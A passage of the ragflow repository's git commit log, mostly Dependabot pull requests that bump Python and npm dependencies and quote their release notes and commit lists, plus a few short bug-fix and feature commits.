href="733f15fe5b"><code>733f15f</code></a>
fix(fetch): fixed ReferenceError issue when TextEncoder is not available
in t...</li>
<li><a
href="3041c61ada"><code>3041c61</code></a>
[Release] v1.7.0 (<a
href="https://redirect.github.com/axios/axios/issues/6408">#6408</a>)</li>
<li><a
href="18b13cbaef"><code>18b13cb</code></a>
chore(docs): add fetch adapter docs; (<a
href="https://redirect.github.com/axios/axios/issues/6407">#6407</a>)</li>
<li><a
href="e62099bc8b"><code>e62099b</code></a>
fix(fetch): fixed a possible memory leak in the AbortController for the
strea...</li>
<li><a
href="b49aa8e3d8"><code>b49aa8e</code></a>
chore(release): v1.7.0-beta.2 (<a
href="https://redirect.github.com/axios/axios/issues/6403">#6403</a>)</li>
<li><a
href="d57f03a77f"><code>d57f03a</code></a>
chore(ci): bump create-pull-request version to fix a bug; (<a
href="https://redirect.github.com/axios/axios/issues/6405">#6405</a>)</li>
<li><a
href="097b0d18e9"><code>097b0d1</code></a>
chore(ci): add tag resolution for npm releases based on package version;
(<a
href="https://redirect.github.com/axios/axios/issues/6404">#6404</a>)</li>
<li>Additional commits viewable in <a
href="https://github.com/axios/axios/compare/v0.27.2...v1.7.2">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=axios&package-manager=npm_and_yarn&previous-version=0.27.2&new-version=1.7.2)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/infiniflow/ragflow/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 16:43:31 +08:00
fdfa5d0ad4 fix graph bug about second retrieval (#1688)
### What problem does this PR solve?

#1651

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-24 14:10:45 +08:00
d96348eb22 add support for LM Studio (#1663)
### What problem does this PR solve?

#1602 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-24 12:46:43 +08:00
100b3165d8 pypdf2 to pypdf (#1684)
### What problem does this PR solve?

pypdf and PyPDF2 possible Infinite Loop when a comment isn't followed by
a character #59

### Type of change

- [x] Refactoring
2024-07-24 12:38:48 +08:00
7e60800c95 feat: add arxiv operator #918 (#1683)
### What problem does this PR solve?

feat: add arxiv operator #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-24 11:36:23 +08:00
cHz
4b195cc14c fix: Misspelled Variable Name (#1662)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-24 11:14:46 +08:00
7034dc8dea build(deps): bump setuptools from 69.5.1 to 70.0.0 (#1666)
Bumps [setuptools](https://github.com/pypa/setuptools) from 69.5.1 to
70.0.0.
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/pypa/setuptools/blob/main/NEWS.rst">setuptools's
changelog</a>.</em></p>
<blockquote>
<h1>v70.0.0</h1>
<h2>Features</h2>
<ul>
<li>Emit a warning when <code>[tools.setuptools]</code> is present in
<code>pyproject.toml</code> and will be ignored. -- by
:user:<code>SnoopJ</code> (<a
href="https://redirect.github.com/pypa/setuptools/issues/4150">#4150</a>)</li>
<li>Improved <code>AttributeError</code> error message if
<code>pkg_resources.EntryPoint.require</code> is called without extras
or distribution
Gracefully &quot;do nothing&quot; when trying to activate a
<code>pkg_resources.Distribution</code> with a <code>None</code>
location, rather than raising a <code>TypeError</code>
-- by :user:<code>Avasam</code> (<a
href="https://redirect.github.com/pypa/setuptools/issues/4262">#4262</a>)</li>
<li>Typed the dynamically defined variables from
<code>pkg_resources</code> -- by :user:<code>Avasam</code> (<a
href="https://redirect.github.com/pypa/setuptools/issues/4267">#4267</a>)</li>
<li>Modernized and refactored VCS handling in package_index. (<a
href="https://redirect.github.com/pypa/setuptools/issues/4332">#4332</a>)</li>
</ul>
<h2>Bugfixes</h2>
<ul>
<li>In install command, use super to call the superclass methods. Avoids
race conditions when monkeypatching from _distutils_system_mod occurs
late. (<a
href="https://redirect.github.com/pypa/setuptools/issues/4136">#4136</a>)</li>
<li>Fix finder template for lenient editable installs of implicit nested
namespaces
constructed by using <code>package_dir</code> to reorganise directory
structure. (<a
href="https://redirect.github.com/pypa/setuptools/issues/4278">#4278</a>)</li>
<li>Fix an error with <code>UnicodeDecodeError</code> handling in
<code>pkg_resources</code> when trying to read files in UTF-8 with a
fallback -- by :user:<code>Avasam</code> (<a
href="https://redirect.github.com/pypa/setuptools/issues/4348">#4348</a>)</li>
</ul>
<h2>Improved Documentation</h2>
<ul>
<li>Uses RST substitution to put badges in 1 line. (<a
href="https://redirect.github.com/pypa/setuptools/issues/4312">#4312</a>)</li>
</ul>
<h2>Deprecations and Removals</h2>
<ul>
<li>
<p>Further adoption of UTF-8 in <code>setuptools</code>.
This change regards mostly files produced and consumed during the build
process
(e.g. metadata files, script wrappers, automatically updated config
files, etc..)
Although precautions were taken to minimize disruptions, some edge cases
might
be subject to backwards incompatibility.</p>
<p>Support for <code>&quot;locale&quot;</code> encoding is now
<strong>deprecated</strong>. (<a
href="https://redirect.github.com/pypa/setuptools/issues/4309">#4309</a>)</p>
</li>
<li>
<p>Remove <code>setuptools.convert_path</code> after long deprecation
period.
This function was never defined by <code>setuptools</code> itself, but
rather a
side-effect of an import for internal usage. (<a
href="https://redirect.github.com/pypa/setuptools/issues/4322">#4322</a>)</p>
</li>
<li>
<p>Remove fallback for customisations of <code>distutils</code>'
<code>build.sub_command</code> after long
deprecated period.
Users are advised to import <code>build</code> directly from
<code>setuptools.command.build</code>. (<a
href="https://redirect.github.com/pypa/setuptools/issues/4322">#4322</a>)</p>
</li>
<li>
<p>Removed <code>typing_extensions</code> from vendored dependencies --
by :user:<code>Avasam</code> (<a
href="https://redirect.github.com/pypa/setuptools/issues/4324">#4324</a>)</p>
</li>
<li>
<p>Remove deprecated <code>setuptools.dep_util</code>.
The provided alternative is <code>setuptools.modified</code>. (<a
href="https://redirect.github.com/pypa/setuptools/issues/4360">#4360</a>)</p>
</li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="5cbf12a9b6"><code>5cbf12a</code></a>
Workaround for release error in v70</li>
<li><a
href="9c1bcc3417"><code>9c1bcc3</code></a>
Bump version: 69.5.1 → 70.0.0</li>
<li><a
href="4dc0c31644"><code>4dc0c31</code></a>
Remove deprecated <code>setuptools.dep_util</code> (<a
href="https://redirect.github.com/pypa/setuptools/issues/4360">#4360</a>)</li>
<li><a
href="6c1ef5748d"><code>6c1ef57</code></a>
Remove xfail now that test passes. Ref <a
href="https://redirect.github.com/pypa/setuptools/issues/4371">#4371</a>.</li>
<li><a
href="d14fa0162c"><code>d14fa01</code></a>
Add all site-packages dirs when creating simulated environment for
test_edita...</li>
<li><a
href="6b7f7a18af"><code>6b7f7a1</code></a>
Prevent <code>bin</code> folders to be taken as extern packages when
vendoring (<a
href="https://redirect.github.com/pypa/setuptools/issues/4370">#4370</a>)</li>
<li><a
href="69141f69f8"><code>69141f6</code></a>
Add doctest for vendorised bin folder</li>
<li><a
href="2a53cc1200"><code>2a53cc1</code></a>
Prevent 'bin' folders to be taken as extern packages</li>
<li><a
href="720862807d"><code>7208628</code></a>
Replace call to deprecated <code>validate_pyproject</code> command (<a
href="https://redirect.github.com/pypa/setuptools/issues/4363">#4363</a>)</li>
<li><a
href="96d681aa40"><code>96d681a</code></a>
Remove call to deprecated validate_pyproject command</li>
<li>Additional commits viewable in <a
href="https://github.com/pypa/setuptools/compare/v69.5.1...v70.0.0">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=setuptools&package-manager=pip&previous-version=69.5.1&new-version=70.0.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/infiniflow/ragflow/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:12:18 +08:00
71f2ba1452 build(deps): bump werkzeug from 3.0.1 to 3.0.3 (#1669)
Bumps [werkzeug](https://github.com/pallets/werkzeug) from 3.0.1 to
3.0.3.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/pallets/werkzeug/releases">werkzeug's
releases</a>.</em></p>
<blockquote>
<h2>3.0.3</h2>
<p>This is the Werkzeug 3.0.3 security release, which fixes security
issues and bugs but does not otherwise change behavior and should not
result in breaking changes.</p>
<p>PyPI: <a
href="https://pypi.org/project/Werkzeug/3.0.3/">https://pypi.org/project/Werkzeug/3.0.3/</a>
Changes: <a
href="https://werkzeug.palletsprojects.com/en/3.0.x/changes/#version-3-0-3">https://werkzeug.palletsprojects.com/en/3.0.x/changes/#version-3-0-3</a>
Milestone: <a
href="https://github.com/pallets/werkzeug/milestone/35?closed=1">https://github.com/pallets/werkzeug/milestone/35?closed=1</a></p>
<ul>
<li>Only allow <code>localhost</code>, <code>.localhost</code>,
<code>127.0.0.1</code>, or the specified hostname when running the dev
server, to make debugger requests. Additional hosts can be added by
using the debugger middleware directly. The debugger UI makes requests
using the full URL rather than only the path. GHSA-2g68-c3qc-8985</li>
<li>Make reloader more robust when <code>&quot;&quot;</code> is in
<code>sys.path</code>. <a
href="https://redirect.github.com/pallets/werkzeug/issues/2823">#2823</a></li>
<li>Better TLS cert format with <code>adhoc</code> dev certs. <a
href="https://redirect.github.com/pallets/werkzeug/issues/2891">#2891</a></li>
<li>Inform Python &lt; 3.12 how to handle <code>itms-services</code>
URIs correctly, rather than using an overly-broad workaround in Werkzeug
that caused some redirect URIs to be passed on without encoding. <a
href="https://redirect.github.com/pallets/werkzeug/issues/2828">#2828</a></li>
<li>Type annotation for <code>Rule.endpoint</code> and other uses of
<code>endpoint</code> is <code>Any</code>. <a
href="https://redirect.github.com/pallets/werkzeug/issues/2836">#2836</a></li>
</ul>
<h2>3.0.2</h2>
<p>This is a fix release for the 3.0.x feature branch.</p>
<ul>
<li>Changes: <a
href="https://werkzeug.palletsprojects.com/en/3.0.x/changes/#version-3-0-2">https://werkzeug.palletsprojects.com/en/3.0.x/changes/#version-3-0-2</a></li>
</ul>
</blockquote>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/pallets/werkzeug/blob/main/CHANGES.rst">werkzeug's
changelog</a>.</em></p>
<blockquote>
<h2>Version 3.0.3</h2>
<p>Released 2024-05-05</p>
<ul>
<li>
<p>Only allow <code>localhost</code>, <code>.localhost</code>,
<code>127.0.0.1</code>, or the specified
hostname when running the dev server, to make debugger requests.
Additional
hosts can be added by using the debugger middleware directly. The
debugger
UI makes requests using the full URL rather than only the path.
:ghsa:<code>2g68-c3qc-8985</code></p>
</li>
<li>
<p>Make reloader more robust when <code>&quot;&quot;</code> is in
<code>sys.path</code>. :pr:<code>2823</code></p>
</li>
<li>
<p>Better TLS cert format with <code>adhoc</code> dev certs.
:pr:<code>2891</code></p>
</li>
<li>
<p>Inform Python &lt; 3.12 how to handle <code>itms-services</code> URIs
correctly, rather
than using an overly-broad workaround in Werkzeug that caused some
redirect
URIs to be passed on without encoding. :issue:<code>2828</code></p>
</li>
<li>
<p>Type annotation for <code>Rule.endpoint</code> and other uses of
<code>endpoint</code> is
<code>Any</code>. :issue:<code>2836</code></p>
</li>
<li>
<p>Make reloader more robust when <code>&quot;&quot;</code> is in
<code>sys.path</code>. :pr:<code>2823</code></p>
</li>
</ul>
<h2>Version 3.0.2</h2>
<p>Released 2024-04-01</p>
<ul>
<li>Ensure setting <code>merge_slashes</code> to <code>False</code>
results in <code>NotFound</code> for
repeated-slash requests against single slash routes.
:issue:<code>2834</code></li>
<li>Fix handling of <code>TypeError</code> in
<code>TypeConversionDict.get()</code> to match
<code>ValueError</code>. :issue:<code>2843</code></li>
<li>Fix <code>response_wrapper</code> type check in test client.
:issue:<code>2831</code></li>
<li>Make the return type of <code>MultiPartParser.parse</code> more
precise.
:issue:<code>2840</code></li>
<li>Raise an error if converter arguments cannot be parsed.
:issue:<code>2822</code></li>
</ul>
</blockquote>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="f9995e9679"><code>f9995e9</code></a>
release version 3.0.3</li>
<li><a
href="3386395b24"><code>3386395</code></a>
Merge pull request from GHSA-2g68-c3qc-8985</li>
<li><a
href="890b6b6263"><code>890b6b6</code></a>
only require trusted host for evalex</li>
<li><a
href="71b69dfb7d"><code>71b69df</code></a>
restrict debugger trusted hosts</li>
<li><a
href="d2d3869525"><code>d2d3869</code></a>
endpoint type is Any (<a
href="https://redirect.github.com/pallets/werkzeug/issues/2895">#2895</a>)</li>
<li><a
href="7080b55acd"><code>7080b55</code></a>
endpoint type is Any</li>
<li><a
href="7555eff296"><code>7555eff</code></a>
remove iri_to_uri redirect workaround (<a
href="https://redirect.github.com/pallets/werkzeug/issues/2894">#2894</a>)</li>
<li><a
href="97fb2f7222"><code>97fb2f7</code></a>
remove _invalid_iri_to_uri workaround</li>
<li><a
href="249527ff98"><code>249527f</code></a>
make cn field a valid single hostname, and use wildcard in SANs field.
(<a
href="https://redirect.github.com/pallets/werkzeug/issues/2892">#2892</a>)</li>
<li><a
href="793be472c9"><code>793be47</code></a>
update adhoc tls dev cert format</li>
<li>Additional commits viewable in <a
href="https://github.com/pallets/werkzeug/compare/3.0.1...3.0.3">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=werkzeug&package-manager=pip&previous-version=3.0.1&new-version=3.0.3)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/infiniflow/ragflow/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:11:16 +08:00
1ec84a589e build(deps): bump aiohttp from 3.9.3 to 3.9.4 (#1670)
Bumps [aiohttp](https://github.com/aio-libs/aiohttp) from 3.9.3 to
3.9.4.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/aio-libs/aiohttp/releases">aiohttp's
releases</a>.</em></p>
<blockquote>
<h2>3.9.4</h2>
<h2>Bug fixes</h2>
<ul>
<li>
<p>The asynchronous internals now set the underlying causes
when assigning exceptions to the future objects
-- by :user:<code>webknjaz</code>.</p>
<p><em>Related issues and pull requests on GitHub:</em>
<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8089">#8089</a>.</p>
</li>
<li>
<p>Treated values of <code>Accept-Encoding</code> header as
case-insensitive when checking
for gzip files -- by :user:<code>steverep</code>.</p>
<p><em>Related issues and pull requests on GitHub:</em>
<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8104">#8104</a>.</p>
</li>
<li>
<p>Improved the DNS resolution performance on cache hit -- by
:user:<code>bdraco</code>.</p>
<p>This is achieved by avoiding an :mod:<code>asyncio</code> task
creation in this case.</p>
<p><em>Related issues and pull requests on GitHub:</em>
<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8163">#8163</a>.</p>
</li>
<li>
<p>Changed the type annotations to allow <code>dict</code> on
:meth:<code>aiohttp.MultipartWriter.append</code>,
:meth:<code>aiohttp.MultipartWriter.append_json</code> and
:meth:<code>aiohttp.MultipartWriter.append_form</code> -- by
:user:<code>cakemanny</code></p>
<p><em>Related issues and pull requests on GitHub:</em>
<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/7741">#7741</a>.</p>
</li>
<li>
<p>Ensure websocket transport is closed when client does not close it
-- by :user:<code>bdraco</code>.</p>
<p>The transport could remain open if the client did not close it. This
change ensures the transport is closed when the client does not close
it.</p>
</li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/aio-libs/aiohttp/blob/master/CHANGES.rst">aiohttp's
changelog</a>.</em></p>
<blockquote>
<h1>3.9.4 (2024-04-11)</h1>
<h2>Bug fixes</h2>
<ul>
<li>
<p>The asynchronous internals now set the underlying causes
when assigning exceptions to the future objects
-- by :user:<code>webknjaz</code>.</p>
<p><em>Related issues and pull requests on GitHub:</em>
:issue:<code>8089</code>.</p>
</li>
<li>
<p>Treated values of <code>Accept-Encoding</code> header as
case-insensitive when checking
for gzip files -- by :user:<code>steverep</code>.</p>
<p><em>Related issues and pull requests on GitHub:</em>
:issue:<code>8104</code>.</p>
</li>
<li>
<p>Improved the DNS resolution performance on cache hit -- by
:user:<code>bdraco</code>.</p>
<p>This is achieved by avoiding an :mod:<code>asyncio</code> task
creation in this case.</p>
<p><em>Related issues and pull requests on GitHub:</em>
:issue:<code>8163</code>.</p>
</li>
<li>
<p>Changed the type annotations to allow <code>dict</code> on
:meth:<code>aiohttp.MultipartWriter.append</code>,
:meth:<code>aiohttp.MultipartWriter.append_json</code> and
:meth:<code>aiohttp.MultipartWriter.append_form</code> -- by
:user:<code>cakemanny</code></p>
<p><em>Related issues and pull requests on GitHub:</em>
:issue:<code>7741</code>.</p>
</li>
<li>
<p>Ensure websocket transport is closed when client does not close it
-- by :user:<code>bdraco</code>.</p>
<p>The transport could remain open if the client did not close it. This
change ensures the transport is closed when the client does not close
it.</p>
</li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="b3397c7ac4"><code>b3397c7</code></a>
Release v3.9.4 (<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8201">#8201</a>)</li>
<li><a
href="a7e240a9f6"><code>a7e240a</code></a>
[PR <a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8320">#8320</a>/9ba9a4e5
backport][3.9] Fix Python parser to mark responses without...</li>
<li><a
href="28335525d1"><code>2833552</code></a>
Escape filenames and paths in HTML when generating index pages (<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8317">#8317</a>)
(<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8319">#8319</a>)</li>
<li><a
href="ed43040613"><code>ed43040</code></a>
[PR <a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8309">#8309</a>/c29945a1
backport][3.9] Improve reliability of run_app test (<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8315">#8315</a>)</li>
<li><a
href="ec2be0500e"><code>ec2be05</code></a>
[PR <a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8299">#8299</a>/28d026eb
backport][3.9] Create marker for internal tests (<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8307">#8307</a>)</li>
<li><a
href="292d961f4e"><code>292d961</code></a>
[PR <a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8304">#8304</a>/88c80c14
backport][3.9] Check for backports in CI (<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8305">#8305</a>)</li>
<li><a
href="cebe526b9c"><code>cebe526</code></a>
Fix handling of multipart/form-data (<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8280">#8280</a>)
(<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8302">#8302</a>)</li>
<li><a
href="270ae9cf6a"><code>270ae9c</code></a>
[PR <a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8297">#8297</a>/d15f07cf
backport][3.9] Upgrade to llhttp 9.2.1 (<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8292">#8292</a>)
(<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8298">#8298</a>)</li>
<li><a
href="bb231059b1"><code>bb23105</code></a>
[PR <a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8283">#8283</a>/54e13b0a
backport][3.9] Fix blocking I/O in the event loop while pr...</li>
<li><a
href="3f79241bcb"><code>3f79241</code></a>
[PR <a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8286">#8286</a>/28f1fd88
backport][3.9] docs: remove repetitive word in comment (<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8">#8</a>...</li>
<li>Additional commits viewable in <a
href="https://github.com/aio-libs/aiohttp/compare/v3.9.3...v3.9.4">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=aiohttp&package-manager=pip&previous-version=3.9.3&new-version=3.9.4)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/infiniflow/ragflow/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:09:31 +08:00
eb40377700 build(deps): bump scikit-learn from 1.4.1.post1 to 1.5.0 (#1671)
Bumps [scikit-learn](https://github.com/scikit-learn/scikit-learn) from
1.4.1.post1 to 1.5.0.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/scikit-learn/scikit-learn/releases">scikit-learn's
releases</a>.</em></p>
<blockquote>
<h2>Scikit-learn 1.5.0</h2>
<p>We're happy to announce the 1.5.0 release.</p>
<p>You can read the release highlights under <a
href="https://scikit-learn.org/stable/auto_examples/release_highlights/plot_release_highlights_1_5_0.html">https://scikit-learn.org/stable/auto_examples/release_highlights/plot_release_highlights_1_5_0.html</a>
and the long version of the change log under <a
href="https://scikit-learn.org/stable/whats_new/v1.5.html">https://scikit-learn.org/stable/whats_new/v1.5.html</a></p>
<p>This version supports Python versions 3.9 to 3.12.</p>
<p>You can upgrade with pip as usual:</p>
<pre><code>pip install -U scikit-learn
</code></pre>
<p>The conda-forge builds can be installed using:</p>
<pre><code>conda install -c conda-forge scikit-learn
</code></pre>
<h2>Scikit-learn 1.4.2</h2>
<p>We're happy to announce the 1.4.2 release.</p>
<p>This release only includes support for numpy 2.</p>
<p>This version supports Python versions 3.9 to 3.12.</p>
<p>You can upgrade with pip as usual:</p>
<pre><code>pip install -U scikit-learn
</code></pre>
</blockquote>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="b51d0c9648"><code>b51d0c9</code></a>
trigger whell builder [cd build]</li>
<li><a
href="919ae9bf72"><code>919ae9b</code></a>
MAINT Reoder what's new for 1.5 (<a
href="https://redirect.github.com/scikit-learn/scikit-learn/issues/29039">#29039</a>)</li>
<li><a
href="0ac28ade87"><code>0ac28ad</code></a>
DOC Release highlights 1.5 (<a
href="https://redirect.github.com/scikit-learn/scikit-learn/issues/29007">#29007</a>)</li>
<li><a
href="729b54d5af"><code>729b54d</code></a>
test py3.12 against numpy 2 [cd build]</li>
<li><a
href="1e50434f18"><code>1e50434</code></a>
set version</li>
<li><a
href="ffbe4ab45b"><code>ffbe4ab</code></a>
DOC remove obsolete SVM example (<a
href="https://redirect.github.com/scikit-learn/scikit-learn/issues/27108">#27108</a>)</li>
<li><a
href="4647729e5e"><code>4647729</code></a>
DOC Fix time complexity of MLP (<a
href="https://redirect.github.com/scikit-learn/scikit-learn/issues/28592">#28592</a>)</li>
<li><a
href="9bd7047b4a"><code>9bd7047</code></a>
FIX convergence criterion of MeanShift (<a
href="https://redirect.github.com/scikit-learn/scikit-learn/issues/28951">#28951</a>)</li>
<li><a
href="b79420f1c2"><code>b79420f</code></a>
FIX add long long for int32/int64 windows compat in NumPy 2.0 (<a
href="https://redirect.github.com/scikit-learn/scikit-learn/issues/29029">#29029</a>)</li>
<li><a
href="37f544db78"><code>37f544d</code></a>
DOC replace pandas with Polars in
examples/gaussian_process/plot_gpr_co2.py (...</li>
<li>Additional commits viewable in <a
href="https://github.com/scikit-learn/scikit-learn/compare/1.4.1.post1...1.5.0">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=scikit-learn&package-manager=pip&previous-version=1.4.1.post1&new-version=1.5.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
